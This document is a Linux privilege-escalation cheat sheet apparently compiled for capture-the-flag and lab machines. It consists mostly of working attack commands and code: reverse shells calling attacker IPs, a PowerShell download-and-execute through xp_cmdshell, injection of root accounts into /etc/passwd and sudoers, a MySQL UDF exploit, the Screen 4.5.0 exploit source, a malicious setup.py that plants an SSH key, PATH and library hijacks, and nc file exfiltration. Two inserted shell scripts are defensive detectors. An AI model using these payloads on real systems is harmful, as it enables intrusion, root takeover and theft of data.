
Privilege Escalation


Priv Esc Links:


1) https://gtfobins.github.io/ -- useful for privesc and jail-escape tasks

2) Priv Esc Tech Explained | Explained 2 | Techniques | Commands | Priv Esc Techniques

3) Linux Restricted Shell Bypass Guide

Things to Check first for Linux Priv Esc


1.   sudo -l 

2.   sudo su

3.   uname -a; cat /proc/version --> check the kernel version for known vulnerabilities

4.   check for files with root priv

5.   check for cron jobs

6.   /etc/passwd file --> writable ?

7.   check for $PATH hijacking opportunities (commands called by relative name in root-run scripts)

8.   check for process with root

9.   run pspy to check for running processes & cron jobs

10. Check .bash_history

11. ls -la the home directory

12. Check /opt/, /var/www/html, /home/, /root, / ,  directories thoroughly 

13. Check for World Readable files

14. Check if mysql is running as root. 

15. "mount" command to check for permissions on folders/processes 

16. Run "pspy -f"  on the target and check for all running file system tasks

17. Check file/folder permissions: even if you don't own a file, the folder holding it might be owned by you, letting you add/delete files or change filenames.

Ex: a file is run as root but its folder is owned by you; delete the file and create a new one with the same name, and you can get root access.





Binary PrivEsc:

file binary

strings binary 

cat binary

ls -la binary

Check the file to see if it's executing any commands.

Check the file paths it uses;

If the command is cat instead of /bin/cat --> path injection might be possible

decrease the size of the terminal and check for changes (pagers such as less behave differently when the output does not fit the screen)

less binary

./binary | less   //Try Getting an Interactive shell with less
      //Then !Command to execute the command, it might only work with a definite screen size

./binary anycommand && /bin/bash 
sudo -l            --> Check for root priv directories and applications
sudo -u USERNAME /PATH/PROGRAM.sh shell.sh
sudo bash                --> Get Root Shell
id                --> get the user's privileges

When id is not installed use this script

awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
Check Version and Distribution

uname -a
cat /proc/version
cat /etc/issue
cat /etc/lsb-release 
sudo id                    --> Check Privilege level
ps aux | grep root             --> check for Applications running with root
netstat -tulpn                   --> see all connections, local and foreign

netstat -a                    --> list all sockets, including listening ports

When netstat is not installed, use an awk replacement (the "netstat without netstat" script)

python -c 'import pty;pty.spawn("/bin/bash")'      --> spawn a PTY shell; sometimes only python3 is available

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'   --> gives a root shell only if the python3 binary is SUID root or carries cap_setuid
Get Interactive Shell:

python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=xterm 
Grep Recursively for a string   

grep -iRI 'password'

#Grep for a user/string
grep bhanu /etc -R 2>/dev/null
Port Scanning using nc

echo "" | nc -nvw2 [targetIP] [port-range]

echo "" | nc -nvw2 10.10.10.10 20-100

Finding Files with Root Privileges: 

find / -perm -4000 2>/dev/null | xargs ls -la

Finding World Writable Files (-perm -2 matches files writable by "others"):
find / -perm -2 ! -type l -ls 2>/dev/null

World Writable & Executable directories:
find / -perm -o=w -perm -o=x -type d 2>/dev/null

World Executable Folders:
find / -perm -o=x -type d 2>/dev/null
Find SUID & SGID  Binaries:
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done 

find / -perm -1000 -type d 2>/dev/null     #Only the owner of the directory or the owner of a file can delete or rename here.

find / -perm -g=s -type f 2>/dev/null      #SGID (chmod 2000) - run as the group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null      #SUID (chmod 4000) - run as the owner, not the user who started it.
List the capabilities of files which grant root-level privileges:

getcap -r / 2>/dev/null 

#List all Capabilities
capsh --print
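A defender-side complement to the SUID/SGID and getcap checks above, added here and not part of the original notes: snapshot the set-id files and file capabilities once, then diff a later snapshot against that baseline so a freshly set-id /bin/bash or a new cap_setuid on an interpreter shows up as drift. The functions, the risky-basename list and the sample snapshot lines are constructed for this example; it assumes find, getcap, comm and awk are present.

```shell
#!/bin/sh
# Added example, not from the original notes: baseline the files that the
# SUID/SGID and getcap checks enumerate, then report drift. A new "s" bit on
# /bin/bash or a new cap_setuid on an interpreter is exactly what the chmod u+s
# tricks in these notes leave behind, and a stored baseline catches it cheaply.

# One line per privileged file, "setid <path>" or "cap <path> <caps>", sorted
# so comm(1) can diff two snapshots. -xdev stays on the root filesystem.
snapshot_privileged_files() {
    {
        find / -xdev \( -perm -4000 -o -perm -2000 \) -type f -print 2>/dev/null \
            | sed 's/^/setid /'
        getcap -r / 2>/dev/null | sed 's/^/cap /'
    } | LC_ALL=C sort
}

# compare_snapshots BASELINE CURRENT
# Prints "ADDED   <line>" / "REMOVED <line>" per difference; returns 1 on drift.
compare_snapshots() {
    if [ -z "$(LC_ALL=C comm -3 "$1" "$2")" ]; then
        return 0
    fi
    LC_ALL=C comm -13 "$1" "$2" | sed 's/^/ADDED   /'
    LC_ALL=C comm -23 "$1" "$2" | sed 's/^/REMOVED /'
    return 1
}

# Basenames these notes show being abused when they run with root rights
# (bash -p, find -exec, perl setuid, nmap --interactive, python os.setuid ...).
RISKY_BASENAMES='bash|sh|dash|python[0-9.]*|perl|find|nmap|vim|vi|less|wget|tar|docker|luvit|screen'

# flag_risky: reads compare_snapshots output on stdin and prefixes "!! " to any
# line whose file basename matches RISKY_BASENAMES.
# Fields: $1 = ADDED/REMOVED, $2 = setid/cap, $3 = path (paths without spaces).
flag_risky() {
    awk -v re="^(${RISKY_BASENAMES})\$" '
        {
            n = split($3, parts, "/")
            if (parts[n] ~ re) print "!! " $0; else print
        }'
}

# Typical use (run as root for a complete view):
#   snapshot_privileged_files > /var/lib/privfiles.baseline   # once, on a known-good host
#   snapshot_privileged_files > /tmp/privfiles.now            # later, e.g. from cron
#   compare_snapshots /var/lib/privfiles.baseline /tmp/privfiles.now | flag_risky
```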
Find Services Running Behind Firewall/Localhost 
netstat -ano
netstat -tulpn

netstat -pantu | grep LIST #View listening ports
Try Sudo inject 
https://github.com/nongiach/sudo_inject  
CRON Jobs 

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root 
Ping Sweep

for i in {1..254} ;do (ping -c 1 10.10.10.$i | grep "bytes from" &) ;done
find . -type f -ls         --> list files in all subdirectories 
lsof -l                    --> list open files and the processes holding them 
echo os.system("/bin/bash")       --> escaping a limited shell via python's os.system 
  
gcc exploit.c -pthread -lcrypt -o Exploit  --> Compile The Exploit

gcc -m32 -Wl,--hash-style=both 9542.c -o exploit  

./Exploit 
cat .bash_history   -->  Check the Commands History
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/ -o allow_other  --> Mount a share folder in your kali machine
 
 df -h                --> Get List of Machine Partitions (Mounted Devices as well)  
/dev/shm            --> World writable directory 
cat /dev/sdb               --> Might contain deleted data in the partition
                               can try strings /dev/sdb for flags
python -m SimpleHTTPServer 8080  --> start an HTTP server on your system to serve files

wget http://yourip/LinuxEnum.sh  --> run this on the target machine to fetch the file
Send a File From Kali To Victim

nc -nlvp 9001 < exploit.c  --> Transfer files from Kali 

nc YourIpAddress 9001 > /tmp/exploit.c  --> Get the file on the target machine (same port as the listener)
Get a File From Victim to Kali

on Kali: nc -l -p 8001 > filefoldername

on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename 
Adding a Route to a different network which is accessible

#sudo ip route add CIDR dev Interface
sudo ip route add 10.10.0.0/24 dev tun2 
When anything can only be run as a specific user:

sudo -u UserName /bin/bash             // works when sudo -l shows an entry for that user       
Getting Root using PATH INJECTION:

This works only for programs started by a relative name (my-program), where the
real binary lives in /bin/my-program but the process list shows just my-program.

This can be exploited when:

1) In the process list --> the full path is not specified; only the relative name is shown

2) You know what causes my-program to run (a cron job, a root-run script, a service) and can trigger it.

3) Check the original location with the "which my-program" command:

          /bin/my-program

4) For this to work you need write access to a directory that comes earlier in PATH, e.g.
   /usr/local/bin; if /usr/local/bin is listed before /bin, this can be exploited.

         echo $PATH       // get the path info
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
This ordering is mandatory: the lookup for my-program checks /usr/local/bin first because
it is first on the list, and if a file named "my-program" exists there the search stops.
5) now go to /usr/local/bin ("cd /usr/local/bin") and create a file with the same name as the program

        vi my-program

6) add a reverse shell to my-program and let the external trigger run it, which
   can get you a root shell. Don't forget to chmod +x my-program
Priv Esc using Path Injection 

this technique can be used when an absolute path is not defined for an executable in a script or service

cd /tmp
echo 'bash -i >& /dev/tcp/10.10.10.10/9002 0>&1' >gzip
echo 'chmod u+s /bin/bash' > suid
chmod +x gzip
export PATH=/tmp:$PATH

#execute the script as root which is using gzip(example) in it.
sudo /opt/script.sh

#SUID permission should look like
#-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash

#for suid permissions run
/bin/bash -p
Exploiting a relative command path used inside a binary


for example, in the binary /usr/local/bin/devil (which has root privs) there is a command that calls "cat"
by its relative name to read a file from /home/freak;

cd /home/freak/

echo "/bin/sh" > cat 
export PATH=/home/freak:/freak:$PATH
/usr/local/bin/devil                 // get root 
Decode Binary to ASCII for Orchid CMS 

perl -lpe '$_=pack"B*",$_' < <( echo 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 )
Dumping Data from Mysql

mysqldump -uUserNAME -pP@$$w0rd DB_NAME 
Getting Root Using Mysql; When mysql is running as root -- Priv Esc


locate udf             // /usr/lib/lib_mysqludf_sys.so --> this must exist for the exploit to work.

mysql -u root -p 
select sys_exec('usermod -a -G admin john');   // adds john to the admin (sudo) group

ctrl + C 

sudo su    //enter user password .. you are root now 


Method II:
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

select sys_exec('chmod u+s /bin/bash');

ctrl + c 

bash -p

Reference - Windows & Linux


Method - III -> Mysql 4.x - 5.x

searchsploit -m exploits/linux/local/1518.c

on Target Machine: 

cd /tmp
wget http://192.168.0.2/1518.c

cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c

gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc


mysql -u root -p


use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/raptor_udf2.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
// If this doesn't work try this -->
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

select * from mysql.func;

select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');

\! sh

cat /tmp/out

exit
exit 

cd /tmp 

vi getroot.c     //add the below content to this 

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setresuid(0, 0, 0);   /* become root; the binary must be SUID root */
    setresgid(0, 0, 0);
    system("/bin/bash");
    return 0;
}
mysql -u root -p 
select * from mysql.func;

//Creating a SUID Binary

select do_system('gcc -o /tmp/getroot /tmp/getroot.c');

select do_system('chmod u+s /tmp/getroot');

exit 
exit 
cd /tmp
./getroot
 

For Windows Follow This --> Github Exploit  Video Tutorial 
Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
 
Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr  // enter the password when prompted 

\dt     // list tables
\dp     // get DB privileges
select * from table_name;   // check the home directory column (just in case) 

Example to update a value in all rows:
update table_name set gid=0 where gid=1001;   // gives root group privileges

or 
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');

Priv Esc when cat is being used in a system() call

when an executable runs cat through system("cat /home/bhanu/root.txt"), we can
point PATH at a directory we control; the shell started by system() resolves
"cat" by searching PATH in order, so it finds our file first.

echo $PATH
//      /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

echo "/bin/bash" > cat

chmod 777 cat 

export PATH=/home/bhanu

echo $PATH
//      /home/bhanu

./file_to_run           /This file has the system() function with cat

#You get a new shell :) but since we replaced the whole PATH, nothing else will resolve until it is restored:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin   
Port Scanning with nc (when nmap is not available):

for p in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $p 2>&1; done | grep open
Port Forwarding using socat:

Start socat listeners on the first compromised machine (Victim-1) that forward ports 8009 & 8080 to Victim-2.

From the Victim-1 machine: do a port scan as above and forward the required ports
// binding the Victim-2 ports on the Victim-1 machine so that we can reach them from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &  
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 & 

netstat -plunt    // view the bound ports; 8009 & 8080 now show on Victim-1


Access the Victim-2 ports from our Kali machine; on the Victim-1 machine: 
socat tcp-listen:4321,fork tcp:KALI_IP:4321 & 

Priv Esc When NMAP Is running as root

/usr/local/bin/nmap  --interactive

!sh 
Priv Esc When wget is running as root

Copy the /etc/passwd from the target machine 

On KALI: 

paste the /etc/passwd from the target and add this line at the end.

bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash

on Target:

sudo wget -O /etc/passwd http://10.10.14.13/passwd
 
su bhanu            // password: password
Priv Esc When Find is Running as root 
find /home -exec sh -i \;
Priv Esc when "Perl"  is running as root

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
Priv Esc When "PWD" is being used in a Binary

export PWD=\$\(/bin/bash\)            // run in the same directory as the binary 
Priv Esc with Spice Ports

netstat -anlp | grep LIST

127.0.0.1:5900 
127.0.0.1:5901 
127.0.0.1:5902               // are listening 

ps -ef | grep 5900         // shows what it is --> spice port; libvirt

On Kali:

remote-viewer           // apt install virt-viewer

proxychains remote-viewer spice://127.0.0.1:5900

proxychains remote-viewer spice://127.0.0.1:5901

proxychains remote-viewer spice://127.0.0.1:5902

when VNC opens --> send key --> ctrl+alt+del --> system reboots

interrupt the process --> press e 

go to the last-but-one line --> change "ro" to "rw init=/bin/sh"

passwd              //change the password
sync
Priv Esc when you have snmpd.conf - rwcommunity string

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10 'nsExtendStatus."evilcommand"' = createAndGo 'nsExtendCommand."evilcommand"' = /usr/bin/python3 'nsExtendArgs."evilcommand"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"KALI_IP\",PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
Priv Esc/Enum when 11211 (memcached) is running 

telnet 127.0.0.1 11211
stats cachedump 1 0
get name1
get name2
Priv Esc When /etc/passwd is World Writable

openssl passwd -1 -salt freak password 
      --> generates a salted MD5-crypt password hash for the /etc/passwd file; 
freak = salt 
password = password

$1$freak$/IWD8R6aL2zyhUZPUeAXm. --> hashed password

username:<hash from above>:0:0::/root:/bin/bash 
                --> entry format; uid 0 / gid 0 creates a new account with root privileges 

echo 'bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash' >>/etc/passwd
            --> append this entry to /etc/passwd to get root access
su bhanu            // password: password 
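Detection counterpart for the technique above, added here and not part of the original notes: `audit_passwd_file` checks a passwd file for the traces an injected root entry leaves (a hash in the password field, a second uid 0 account, loose file permissions). The function and the sample file it is tested against are constructed for this example; it assumes GNU or busybox stat(1) and awk.

```shell
#!/bin/sh
# Added example, not from the original notes: audit an /etc/passwd file for the
# artefacts the world-writable-passwd trick leaves behind. Takes the file path
# as an argument so a copy pulled from a host can be checked offline.
#
# Findings, one per line "FLAG<TAB>detail":
#   PERMS           file writable by group or others
#   BAD_FIELDS      line does not have the 7 colon-separated fields
#   DUP_NAME        same username appears more than once
#   EXTRA_UID0      an account other than root has uid 0
#   EMPTY_PASSWORD  empty password field (login without a password)
#   HASH_IN_PASSWD  password field holds a hash instead of x / * / ! (an
#                   'openssl passwd -1' hash written here bypasses /etc/shadow)
# Returns 1 when anything was flagged.
audit_passwd_file() {
    _file=${1:-/etc/passwd}
    _rc=0
    _mode=$(stat -L -c '%a' "$_file" | tail -c 3)
    # group digit and other digit of the mode; 2, 3, 6 and 7 carry the write bit
    case "$(printf '%s' "$_mode" | cut -c1)$(printf '%s' "$_mode" | cut -c3)" in
        *[2367]*) printf 'PERMS\t%s has mode %s\n' "$_file" "$_mode"; _rc=1 ;;
    esac
    _findings=$(awk -F: '
        NF != 7 { printf "BAD_FIELDS\tline %d has %d fields\n", NR, NF; next }
        seen[$1]++ { printf "DUP_NAME\t%s (line %d)\n", $1, NR }
        $3 == 0 && $1 != "root" { printf "EXTRA_UID0\t%s shell=%s home=%s\n", $1, $7, $6 }
        $2 == "" { printf "EMPTY_PASSWORD\t%s\n", $1 }
        $2 != "" && $2 != "x" && $2 != "*" && $2 !~ /^!/ {
            printf "HASH_IN_PASSWD\t%s field=%s\n", $1, $2 }
    ' "$_file")
    if [ -n "$_findings" ]; then
        printf '%s\n' "$_findings"
        _rc=1
    fi
    return $_rc
}

# Check the live file when run directly.
audit_passwd_file /etc/passwd && echo "/etc/passwd looks clean"
```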
Priv Esc Using Python Library Hijacking 

Rastalab - Python Library Hijacking 

# go to the location of the python script that you are trying to hijack,
# which runs as root or as the required user 

python -c 'import sys; print "\n".join(sys.path)'

#select a library, ex: shutil; go to a writable directory
mkdir fakelib
cd fakelib
nano shutil.py

import os

def make_archive(a, b, c):
    os.system("nc 10.10.10.10 9001 -e '/bin/sh'")


#exit 
#for example; if you can run root_script.sh as root without pass and it uses some python script 
sudo PYTHONPATH=~/fakelib /opt/scripts/root_script.sh
Priv Esc When Sysinfo is running as root

mkdir /tmp/hack
cd /tmp/hack

nano lshw    // or fdisk, or any other command that is executed when you run sysinfo

#Add a reverse shell in the file 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

chmod +x lshw 

#add the folder to PATH, so that when sysinfo runs it checks our directory first

export PATH=/tmp/hack:$PATH

sysinfo
Priv Esc When /bin/bash or /bin/sh is SUID 
/bin/bash -p             // -p keeps the effective uid, so privileges are not dropped  
/bin/sh -p               // -p keeps the effective uid, so privileges are not dropped 
Priv Esc for Sudo 1.8.27 -- (ALL, !root) /bin/bash

sudo -u#-1 /bin/bash
Priv Esc When luvit can be run without Password 

sudo -u USERNAME /home/sysadmin/luvit -e 'os.execute("/bin/bash")' 
Priv Esc when a User is running in Docker

https://gtfobins.github.io/gtfobins/docker/

docker images

docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
 
Priv Esc when Snapd (< 2.37.1) is running

snap version               //Check for version - anything before 2.37.1 is vulnerable

Use this exploit          // Creates a new account 

su dirty_sock            //password: dirty_sock
snap changes            //See changes - if sudo doesnt work
Priv Esc When Screen 4.5.0 is running as Root

https://www.exploit-db.com/exploits/41154 

save the below content into rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    char *argv[] = {"sh", NULL};   /* execvp takes exactly two arguments */
    execvp("/bin/sh", argv);
    return 0;
}

gcc -o /tmp/rootshell /tmp/rootshell.c   //Compile it


save the below content into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c   //Compile it


copy both the executable into /tmp directory in the target machine ..

Follow the below commands:

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" 
screen -ls
/tmp/rootshell 
When Wildcard is used in Sudo 

sudo -l 

//Wildcard example --> /home/*/*/file.txt (This case is vulnerable)
/var/www/*/*/file.txt

dpkg -l sudo             //1.8.16 sudo is vulnerable 

searchsploit sudoedit

searchsploit -m linux/local/37710.txt

Exploitation:

mkdir folder1
cd folder1
mkdir folder2
cd folder2
ln -s /home/username/.ssh/authorized_keys file.html      //Create a symbolic link 

sudoedit -u username /var/www/folder1/folder2/file.html  //add id-rsa.pub here 

OR

sudoedit -u username /var/www/ .ssh/authorized_keys /file.html    // the editor opens the two paths as two files, so .ssh/authorized_keys can be edited

On Kali: ssh-keygen   //Copy the id_rsa.pub to authorized_keys which is file.html

ssh -i id_rsa username@IP_ADDRESS 
Priv Esc with ldapsearch 

Might be useful --> ldapsearch usage by DigitalOcean

cd /home/user/
cat ~/.ldaprc # if you read/see this file - you can authenticate


#Enumerate Users

ldapsearch -x -LLL -w P@SSWORD!

ldap can be used to exploit ssh access. if you have permission to ldap -
you can change the permission of a user and make them root user and allow ssh access

#Select a proper/useful group which has more priv than you ex;root/sudo
cat /etc/group

#Create a SSH public and private key
ssh-keygen -t rsa -f filename

#Select a user from the ldapsearch results --> save the below into bhanu.ldif
#Modify gidNumber & sshPublicKey

dn: uid=bhanu,ou=users,ou=citrix,ou=servers,dc=steins,dc=local
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: <contents of filename.pub, starting with ssh-rsa>
-
replace: userPassword
userPassword: P@ssword!
-
replace: gidNumber
gidNumber: 55

#Run the ldapmodify query to change the user's password and gid

ldapmodify -D "cn=current_user,dc=steins,dc=local" -w P@SSWORD! -f bhanu.ldif
Priv Esc when Pypi Server is running 

Get the steps from here

mkdir /tmp/shit
cd /tmp/shit
touch setup.py setup.cfg README.md
mkdir shit
cd shit
nano __init__.py

def hello_world(): print("hello world")

nano ../setup.py

from setuptools import setup

try:
    print('Yo, let me save my ssh key on your machine, so that I can log in')
    with open('/home/low/.ssh/authorized_keys', 'w+') as f:
        f.writelines('ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCfz8MF+Oae5...')

except:
    setup(
        name='Shit_Program',
        packages=['shit'],
        description='Hello world enterprise edition',
        version='0.1',
        url='http://pypi.sneakycorp.htb/shit',
        author='shit',
        author_email='shit@bhanu.notes',
        keywords=['pip','shit','example'])



nano ../setup.cfg
[metadata]
description-file = README.md


cd ..
python3 setup.py sdist
cd dist
export HOME=/tmp/shit
cd ..
nano .pypirc
[distutils]
index-servers =
    pypi
    shit

[pypi]
username:
password:

[shit]
repository: http://127.0.0.1:5000
username: pypi
password: password

python3 setup.py sdist upload -r shit
Output:
running upload
Submitting dist/Shit_Program-0.1.tar.gz to http://127.0.0.1:5000
Server response (200): OK



cat /home/low/.ssh/authorized_keys #our ssh key
Priv Esc When Pip is running with no Passwd

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip3 install $TF

Priv Esc for chkrootkit
cat /etc/crontab              // chkrootkit is running from cron
dpkg -l chkrootkit            // chkrootkit 0.49-4ubuntu1 is vulnerable
searchsploit -m exploits/linux/local/33899.txt
cd /tmp
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
sudo su                       // after the crontab time, run this and get root :) 
PrivEsc When Dbus is Running 
  

gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /home/root.txt true 

resource

Escaping Limited Shell via SSH


ssh bhanu@10.10.10.10 -t "/bin/bash"      --> Escaping Limited Shell using ssh

Running Applications using SSH

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i ens33 -U -s0 -w - 'not port 22'" > network.cap

-s0 = capture everything; -w - = write the data; 'not port 22' = do not capture port 22 traffic 

wireshark -k network.cap               //-k = view the live traffic capture immediately.

ssh 10.10.14.37@10.10.10.119 "/usr/sbin/tcpdump -i lo -U -s0 -w - 'not port 22'" | wireshark -k -i -
//View Live Traffic
cmd /c dir \users\administrator     --> to execute in web shell
formurl = -o uploads/revshell.php //10.10.14.3/revshell.php 
           -> uploading a reverse shell via Burp Suite; 
              -o <destination> <source>
run the shell using IP/uploads/revshell.php and start a meterpreter 
find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null
          --> all files and dir with root access 
tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/sh 
                  --> get a proper shell from a restricted shell

Try all the commands from this link one by one to get a complete shell 
https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf 
mysql -u root -p               // logging as a root in mysql 

\! ls -l                       //Execute Commands 
Connecting to SQL Server:

sqsh -S 10.10.10.59 -U username -P password

xp_cmdshell 'whoami'            /execute commands

//If xp_cmdshell is not turned on --> follow this 

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
xp_cmdshell 'whoami'
go

Getting a Reverse Shell
cp nishang/Shells/Invoke-PowerShellTcp.ps1 nishang.ps1

Add this line at the end of the file & Save it
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.11 -Port 9001

python -m SimpleHTTPServer 8001

nc -nvlp 9001

xp_cmdshell "powershell IEX(New-Object Net.webClient).DownloadString('http://10.10.14.11:8001/nishang.ps1')"

we get shell on netcat connection
Finding Passwords from a PCAP file using TCPDUMP:
tcpdump -nt -r capture.pcap -A 2>/dev/null | grep -P 'pwd=' 
